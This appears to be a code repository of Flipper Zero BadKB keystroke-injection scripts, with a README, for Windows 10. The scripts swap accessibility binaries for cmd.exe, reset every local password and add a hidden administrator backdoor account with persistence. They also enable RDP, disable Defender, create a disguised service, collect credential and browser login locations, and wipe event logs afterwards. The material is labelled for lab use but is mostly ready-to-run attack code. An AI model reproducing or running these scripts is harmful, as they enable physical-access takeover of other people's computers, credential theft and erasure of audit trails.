├── README.md ├── config.txt ├── post-exploited-Win10.txt ├── eraser-fingers-Win10.txt └── Win10-UserPass-Remover.txt /README.md: -------------------------------------------------------------------------------- 1 | # Win10-Deity 2 | Script for removing user or admin password on Win10 using BadKB for Momentum FlipperZero. 3 | 4 | # Use in laboratory work 5 | # Execution sequence: 6 | 7 | Preparation: Connect a Flipper Zero to Win10-PC (win10 in recovery mode, boot from a recovery flash drive Win10) 8 | Execution: Win10-UserPass-Remover.txt on BadKB (Flipper Zero Momentum) 9 | 10 | # Post-operation: post-exploited-Win10.txt (reboot to normal mode, start script on the login screen) 11 | 12 | # Cleaning: eraser-fingers-Win10.txt (after completing the test) 13 | 14 | # Logging and reporting: 15 | 16 | All actions are logged in C:\Windows\Temp\pentest.log 17 | Collected information in C:\Windows\Temp\harvest.txt 18 | System information in C:\Windows\Temp\sysinfo.txt 19 | -------------------------------------------------------------------------------- /config.txt: -------------------------------------------------------------------------------- 1 | REM ================================================================ 2 | REM Configuration File for Advanced Windows Reset 3 | REM Modify these values according to your lab requirements 4 | REM ================================================================ 5 | 6 | REM === BASIC SETTINGS === 7 | DEFINE NEW_PASSWORD 123456 8 | DEFINE BACKDOOR_USER $lab$admin$ 9 | DEFINE BACKDOOR_PASS Fl1pp3r2024! 10 | 11 | REM === TIMING SETTINGS (milliseconds) === 12 | DEFINE DELAY_RECOVERY 3000 13 | DEFINE DELAY_COMMAND 1000 14 | DEFINE DELAY_LONG 2000 15 | 16 | REM === FILE SETTINGS === 17 | DEFINE LOG_FILE pentest_log.txt 18 | DEFINE HARVEST_FILE harvest.txt 19 | DEFINE SYSINFO_FILE sysinfo.txt 20 | 21 | REM === FEATURE FLAGS (1=enabled, 0=disabled) === 22 | DEFINE ENABLE_RDP 1 23 | DEFINE DISABLE_DEFENDER 1 24 | DEFINE ENABLE_PERSISTENCE 1 25 | DEFINE ENABLE_HARVEST 1 26 | DEFINE ENABLE_LOGGING 1 27 | -------------------------------------------------------------------------------- /post-exploited-Win10.txt: -------------------------------------------------------------------------------- 1 | REM ================================================================ 2 | REM Post-Exploitation Script - Run after successful login 3 | REM Advanced system compromise and data collection 4 | REM ================================================================ 5 | 6 | DELAY 2000 7 | 8 | REM Open elevated command prompt multiple ways 9 | GUI u 10 | DELAY 1500 11 | 12 | REM Execute advanced reset script 13 | STRING cd /d C:\Windows\Temp\ && advanced_reset.bat 14 | ENTER 15 | DELAY 3000 16 | 17 | REM === ADVANCED POST-EXPLOITATION === 18 | 19 | REM Enable RDP 20 | STRING reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 21 | ENTER 22 | STRING netsh advfirewall firewall set rule group="remote desktop" new enable=Yes 23 | ENTER 24 | 25 | REM Disable Windows Defender (for lab environment) 26 | STRING reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f 27 | ENTER 28 | STRING reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f 29 | ENTER 30 | 31 | REM Create advanced backdoor service 32 | STRING sc create "WindowsUpdateService" binpath="cmd.exe /k net user $BACKDOOR_USER$ /active:yes" start=auto 33 | ENTER 34 | 35 | REM Gather sensitive information 36 | STRING echo === CREDENTIAL HARVEST === > C:\Windows\Temp\harvest.txt 37 | ENTER 38 | STRING dir C:\Users\*\Desktop\*.txt /s >> C:\Windows\Temp\harvest.txt 2>nul 39 | ENTER 40 | STRING dir C:\Users\*\Documents\password* /s >> C:\Windows\Temp\harvest.txt 2>nul 41 | ENTER 42 | STRING cmdkey /list >> C:\Windows\Temp\harvest.txt 2>nul 43 | ENTER 44 | 45 | REM Network discovery 46 | STRING echo === NETWORK RECONNAISSANCE === >> C:\Windows\Temp\harvest.txt 47 | ENTER 48 | STRING ipconfig /all >> C:\Windows\Temp\harvest.txt 49 | ENTER 50 | STRING net view >> C:\Windows\Temp\harvest.txt 2>nul 51 | ENTER 52 | STRING net use >> C:\Windows\Temp\harvest.txt 2>nul 53 | ENTER 54 | STRING net share >> C:\Windows\Temp\harvest.txt 2>nul 55 | ENTER 56 | 57 | REM Browser credential extraction locations 58 | STRING echo === BROWSER DATA LOCATIONS === >> C:\Windows\Temp\harvest.txt 59 | ENTER 60 | STRING dir "C:\Users\*\AppData\Local\Google\Chrome\User Data\Default\Login Data" /s >> C:\Windows\Temp\harvest.txt 2>nul 61 | ENTER 62 | STRING dir "C:\Users\*\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*\logins.json" /s >> C:\Windows\Temp\harvest.txt 2>nul 63 | ENTER 64 | 65 | REM System persistence check 66 | STRING echo === PERSISTENCE STATUS === >> C:\Windows\Temp\harvest.txt 67 | ENTER 68 | STRING schtasks /query | findstr $BACKDOOR_USER$ >> C:\Windows\Temp\harvest.txt 2>nul 69 | ENTER 70 | STRING net user $BACKDOOR_USER$ >> C:\Windows\Temp\harvest.txt 2>nul 71 | ENTER 72 | 73 | STRING echo Advanced post-exploitation completed. 74 | ENTER 75 | STRING echo Check C:\Windows\Temp\ for collected data. 76 | ENTER 77 | 78 | DELAY 2000 79 | ALT F4 -------------------------------------------------------------------------------- /eraser-fingers-Win10.txt: -------------------------------------------------------------------------------- 1 | REM ================================================================ 2 | REM Cleanup and Restoration Script 3 | REM Removes traces and restores original system state 4 | REM ================================================================ 5 | 6 | DELAY 1000 7 | 8 | REM Open elevated command prompt 9 | GUI r 10 | DELAY 500 11 | STRING powershell 12 | CTRL SHIFT ENTER 13 | DELAY 2000 14 | LEFT 15 | ENTER 16 | DELAY 2000 17 | 18 | REM === COMPREHENSIVE CLEANUP === 19 | 20 | REM Stop and remove backdoor service 21 | STRING Stop-Service "WindowsUpdateService" -Force -ErrorAction SilentlyContinue 22 | ENTER 23 | STRING Remove-Service "WindowsUpdateService" -ErrorAction SilentlyContinue 24 | ENTER 25 | 26 | REM Remove backdoor user 27 | STRING Remove-LocalUser -Name "$BACKDOOR_USER$" -ErrorAction SilentlyContinue 28 | ENTER 29 | 30 | REM Restore original system files 31 | STRING $drives = @('C', 'D', 'E', 'F') 32 | ENTER 33 | STRING foreach ($drive in $drives) { 34 | ENTER 35 | STRING $path = "${drive}:\Windows\System32" 36 | ENTER 37 | STRING if (Test-Path "$path\utilman.exe.bak") { 38 | ENTER 39 | STRING Copy-Item "$path\utilman.exe.bak" "$path\utilman.exe" -Force 40 | ENTER 41 | STRING Remove-Item "$path\utilman.exe.bak" -Force 42 | ENTER 43 | STRING } 44 | ENTER 45 | STRING if (Test-Path "$path\sethc.exe.bak") { 46 | ENTER 47 | STRING Copy-Item "$path\sethc.exe.bak" "$path\sethc.exe" -Force 48 | ENTER 49 | STRING Remove-Item "$path\sethc.exe.bak" -Force 50 | ENTER 51 | STRING } 52 | ENTER 53 | STRING if (Test-Path "$path\osk.exe.bak") { 54 | ENTER 55 | STRING Copy-Item "$path\osk.exe.bak" "$path\osk.exe" -Force 56 | ENTER 57 | STRING Remove-Item "$path\osk.exe.bak" -Force 58 | ENTER 59 | STRING } 60 | ENTER 61 | STRING } 62 | ENTER 63 | 64 | REM Clean temporary files 65 | STRING Remove-Item "C:\Windows\Temp\advanced_reset.bat" -ErrorAction SilentlyContinue 66 | ENTER 67 | STRING Remove-Item "C:\Windows\Temp\persist.bat" -ErrorAction SilentlyContinue 68 | ENTER 69 | STRING Remove-Item "C:\Windows\Temp\harvest.txt" -ErrorAction SilentlyContinue 70 | ENTER 71 | STRING Remove-Item "C:\Windows\Temp\sysinfo.txt" -ErrorAction SilentlyContinue 72 | ENTER 73 | STRING Remove-Item "C:\Windows\Temp\pentest.log" -ErrorAction SilentlyContinue 74 | ENTER 75 | STRING Remove-Item "C:\Windows\Temp\$BACKDOOR_USER$.txt" -ErrorAction SilentlyContinue 76 | ENTER 77 | 78 | REM Restore Windows Defender (if disabled) 79 | STRING Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name "DisableAntiSpyware" -ErrorAction SilentlyContinue 80 | ENTER 81 | STRING Remove-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" -Name "DisableRealtimeMonitoring" -ErrorAction SilentlyContinue 82 | ENTER 83 | 84 | REM Clear event logs (for lab environment) 85 | STRING wevtutil cl System 86 | ENTER 87 | STRING wevtutil cl Security 88 | ENTER 89 | STRING wevtutil cl Application 90 | ENTER 91 | 92 | STRING Write-Host "Cleanup completed. System restored to original state." -ForegroundColor Green 93 | ENTER 94 | 95 | STRING exit 96 | ENTER 97 | -------------------------------------------------------------------------------- /Win10-UserPass-Remover.txt: -------------------------------------------------------------------------------- 1 | REM ================================================================ 2 | REM Advanced Windows 10 Password Reset & Backdoor Installation 3 | REM For Flipper Zero Momentum Firmware - Lab/Educational Use Only 4 | REM Version: 2.0 | Author: KL3FT3Z (https://github.com/toxy4ny) 5 | REM ================================================================ 6 | 7 | REM === CONFIGURATION SECTION === 8 | DEFINE NEW_PASSWORD 123456 9 | DEFINE BACKDOOR_USER $lab$admin$ 10 | DEFINE BACKDOOR_PASS Fl1pp3r2024! 11 | DEFINE LOG_FILE pentest_log.txt 12 | DEFINE DELAY_RECOVERY 3000 13 | DEFINE DELAY_COMMAND 1000 14 | 15 | REM === STAGE 1: RECOVERY MODE NAVIGATION === 16 | DELAY $DELAY_RECOVERY$ 17 | 18 | REM Navigate to recovery options 19 | TAB 20 | TAB 21 | ENTER 22 | DELAY 2000 23 | 24 | REM Troubleshoot -> Advanced options -> Command Prompt 25 | ENTER 26 | DELAY 1500 27 | ENTER 28 | DELAY 1500 29 | DOWN 30 | DOWN 31 | ENTER 32 | DELAY 3000 33 | 34 | REM === STAGE 2: SYSTEM DETECTION & BACKUP === 35 | STRING echo [%TIME%] Starting advanced Windows penetration test > %TEMP%\$LOG_FILE$ 36 | ENTER 37 | DELAY 500 38 | 39 | REM Multi-drive Windows detection with logging 40 | STRING for %%d in (C D E F G H) do ( 41 | ENTER 42 | STRING if exist %%d:\Windows\System32\utilman.exe ( 43 | ENTER 44 | STRING echo [%TIME%] Windows installation found on %%d: >> %TEMP%\$LOG_FILE$ 45 | ENTER 46 | STRING echo Found Windows on %%d: - Creating backup... 47 | ENTER 48 | STRING copy %%d:\Windows\System32\utilman.exe %%d:\Windows\System32\utilman.exe.bak 49 | ENTER 50 | STRING copy %%d:\Windows\System32\sethc.exe %%d:\Windows\System32\sethc.exe.bak 51 | ENTER 52 | STRING copy %%d:\Windows\System32\osk.exe %%d:\Windows\System32\osk.exe.bak 53 | ENTER 54 | STRING echo %%d > %TEMP%\target_drive.txt 55 | ENTER 56 | STRING set WDRIVE=%%d 57 | ENTER 58 | STRING goto :exploit 59 | ENTER 60 | STRING ) 61 | ENTER 62 | STRING ) 63 | ENTER 64 | STRING echo No Windows installation found! 65 | ENTER 66 | STRING pause 67 | ENTER 68 | STRING goto :end 69 | ENTER 70 | 71 | STRING :exploit 72 | ENTER 73 | 74 | REM === STAGE 3: MULTIPLE BACKDOOR INSTALLATION === 75 | STRING echo [%TIME%] Installing multiple backdoors >> %TEMP%\$LOG_FILE$ 76 | ENTER 77 | 78 | REM Backdoor 1: utilman.exe replacement 79 | STRING copy /Y %WDRIVE%:\Windows\System32\cmd.exe %WDRIVE%:\Windows\System32\utilman.exe 80 | ENTER 81 | 82 | REM Backdoor 2: Sticky Keys (sethc.exe) 83 | STRING copy /Y %WDRIVE%:\Windows\System32\cmd.exe %WDRIVE%:\Windows\System32\sethc.exe 84 | ENTER 85 | 86 | REM Backdoor 3: On-Screen Keyboard 87 | STRING copy /Y %WDRIVE%:\Windows\System32\cmd.exe %WDRIVE%:\Windows\System32\osk.exe 88 | ENTER 89 | 90 | REM === STAGE 4: REGISTRY MANIPULATION === 91 | STRING echo [%TIME%] Modifying registry for persistence >> %TEMP%\$LOG_FILE$ 92 | ENTER 93 | 94 | REM Load system registry hive 95 | STRING reg load HKLM\TEMP_SYSTEM %WDRIVE%:\Windows\System32\config\SYSTEM 96 | ENTER 97 | 98 | REM Enable built-in Administrator 99 | STRING reg add "HKLM\TEMP_SYSTEM\Setup" /v "CmdLine" /t REG_SZ /d "cmd.exe /k net user Administrator /active:yes" /f 100 | ENTER 101 | 102 | REM Unload registry hive 103 | STRING reg unload HKLM\TEMP_SYSTEM 104 | ENTER 105 | 106 | REM === STAGE 5: PREPARE ADVANCED PAYLOAD === 107 | STRING echo [%TIME%] Creating advanced payload script >> %TEMP%\$LOG_FILE$ 108 | ENTER 109 | 110 | REM Create sophisticated password reset script 111 | STRING echo @echo off > %WDRIVE%:\Windows\Temp\advanced_reset.bat 112 | ENTER 113 | STRING echo echo [%%TIME%%] Advanced Password Reset Started >> %WDRIVE%:\Windows\Temp\pentest.log 2^>^&1 >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 114 | ENTER 115 | 116 | REM Add comprehensive user enumeration and password reset 117 | STRING echo for /f "tokens=1" %%u in ('net user ^| findstr /v "command completed successfully" ^| findstr /v "^-" ^| findstr /v "accounts for" ^| findstr /v "^The command" ^| findstr /v "^$"') do ( >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 118 | ENTER 119 | STRING echo echo Resetting password for: %%u >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 120 | ENTER 121 | STRING echo net user "%%u" "$NEW_PASSWORD$" 2^>nul ^|^| echo Failed to reset %%u >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 122 | ENTER 123 | STRING echo ^) >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 124 | ENTER 125 | 126 | REM Add backdoor user creation 127 | STRING echo net user "$BACKDOOR_USER$" "$BACKDOOR_PASS$" /add /comment:"System Support Account" 2^>nul >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 128 | ENTER 129 | STRING echo net localgroup administrators "$BACKDOOR_USER$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 130 | ENTER 131 | STRING echo net localgroup "Remote Desktop Users" "$BACKDOOR_USER$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 132 | ENTER 133 | 134 | REM Add system information gathering 135 | STRING echo echo System Information: >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 136 | ENTER 137 | STRING echo systeminfo ^| findstr /i "domain" >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 138 | ENTER 139 | STRING echo net localgroup administrators >> %WDRIVE%:\Windows\Temp\advanced_reset.bat 140 | ENTER 141 | 142 | REM === STAGE 6: PERSISTENCE MECHANISMS === 143 | STRING echo [%TIME%] Installing persistence mechanisms >> %TEMP%\$LOG_FILE$ 144 | ENTER 145 | 146 | REM Create startup persistence script 147 | STRING echo @echo off > %WDRIVE%:\Windows\Temp\persist.bat 148 | ENTER 149 | STRING echo if not exist "%WDRIVE%:\Windows\Temp\$BACKDOOR_USER$.txt" ( >> %WDRIVE%:\Windows\Temp\persist.bat 150 | ENTER 151 | STRING echo net user "$BACKDOOR_USER$" "$BACKDOOR_PASS$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\persist.bat 152 | ENTER 153 | STRING echo net localgroup administrators "$BACKDOOR_USER$" /add 2^>nul >> %WDRIVE%:\Windows\Temp\persist.bat 154 | ENTER 155 | STRING echo echo persistent > "%WDRIVE%:\Windows\Temp\$BACKDOOR_USER$.txt" >> %WDRIVE%:\Windows\Temp\persist.bat 156 | ENTER 157 | STRING echo ^) >> %WDRIVE%:\Windows\Temp\persist.bat 158 | ENTER 159 | 160 | REM === STAGE 7: SYSTEM INFORMATION COLLECTION === 161 | STRING echo [%TIME%] Collecting system information >> %TEMP%\$LOG_FILE$ 162 | ENTER 163 | 164 | REM Gather system details for later analysis 165 | STRING echo echo === SYSTEM RECONNAISSANCE === > %WDRIVE%:\Windows\Temp\sysinfo.txt 166 | ENTER 167 | STRING dir %WDRIVE%:\Users >> %WDRIVE%:\Windows\Temp\sysinfo.txt 168 | ENTER 169 | STRING type %WDRIVE%:\Windows\System32\config\SAM 2^>nul ^| find /c ":" >> %WDRIVE%:\Windows\Temp\sysinfo.txt 170 | ENTER 171 | 172 | REM === STAGE 8: COMPLETION AND REBOOT === 173 | STRING echo [%TIME%] Payload installation completed >> %TEMP%\$LOG_FILE$ 174 | ENTER 175 | STRING echo. 176 | ENTER 177 | STRING echo ======================================== 178 | ENTER 179 | STRING echo ADVANCED WINDOWS PENETRATION COMPLETE 180 | ENTER 181 | STRING echo ======================================== 182 | ENTER 183 | STRING echo Backdoors installed: 184 | ENTER 185 | STRING echo - Accessibility tools (Win+U, 5x Shift, Win+Ctrl+O) 186 | ENTER 187 | STRING echo - Registry persistence enabled 188 | ENTER 189 | STRING echo - Backdoor user: $BACKDOOR_USER$ 190 | ENTER 191 | STRING echo - Default password: $NEW_PASSWORD$ 192 | ENTER 193 | STRING echo. 194 | ENTER 195 | STRING echo System will reboot in 10 seconds... 196 | ENTER 197 | 198 | STRING timeout 10 199 | ENTER 200 | 201 | STRING :end 202 | ENTER 203 | STRING wpeutil reboot 204 | ENTER --------------------------------------------------------------------------------